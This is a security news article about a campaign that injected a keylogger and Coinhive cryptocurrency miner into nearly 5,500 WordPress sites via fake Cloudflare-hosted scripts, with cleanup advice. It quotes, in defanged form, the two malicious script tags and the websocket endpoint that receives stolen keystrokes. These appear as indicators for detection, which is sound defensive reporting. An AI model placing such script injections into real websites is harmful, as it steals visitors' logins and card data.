Keylogger found on nearly 5,500 Infected WordPress websites




Nearly 5,500 WordPress sites are infected with a malicious script that logs keystrokes and sometimes loads an in-browser cryptocurrency miner.

The malicious script is being loaded from the domain, which is not related to the real Cloudflare, and logs anything that users type inside form fields as soon as the user switches away from an input field.

The script is loaded on both a site's frontend and backend, which means that it can log username and password when logging into the admin panel of the site.




The script is dangerous when running on the frontend because on most WordPress sites the only place it could steal user data is from comment fields, and some WordPress sites are configured to work as online stores as well. In these cases, hackers can steal credit card data and other personal users information.

These attacks are not new, and Sucuri cybersecurity firm has detected three different malicious scripts hosted on the domain.

The first attack was spotted in April, then hackers used a malicious JavaScript file. In November, the same hacker group changed the tactics and was loading malicious scripts disguised as fake jQuery and Google Analytics JavaScript files that were actually a copy of the Coinhive cryptocurrency miner. By November 22, this campaign was spotted on the 1833 site.

In the last series of attacks, hackers have retained the cryptojacking script, but have also added the keylogger.

The script is active on nearly 5,500 WordPress sites

According to PublicWWW, this malicious version of the script is currently active on 5,496 sites.

The two malicious scripts that are known to load the keylogger are:

< script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/reconnecting-websocket/1.0.0/reconnecting-websocket.js' >< /script >

< script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/cors/cors.js' >< /script >

The stolen data is sent to wss://cloudflare[.]solutions:8085/.

If your site is infected, be aware that the malicious code resides in the function.php file of the WordPress theme. You should remove the add_js_scripts function and all the add_action clauses that mention add_js_scripts.

Since it's a keylogger, in fact, all WordPress passwords are compromised, so the next mandatory step of the cleanup is changing the passwords.

Would you like to comment on this article?




New banking malware FakeBank can intercept messages to steal data and money

FakeBank malware can steal sensitive information from the device including phone numbers, balance on a linked bank card and location data.


New Cryptomix ransomware variant released

Hackers have released a new version of Cryptomix that adds the .SERVER extension to encrypted files.


Meltdown and Specter vulnerabilities affect Intel, ARM, AMD processors

Almost all PCs, laptops, tablets and smartphones are in danger, regardless of manufacturer or operating system.

Sign up for our online newsletter!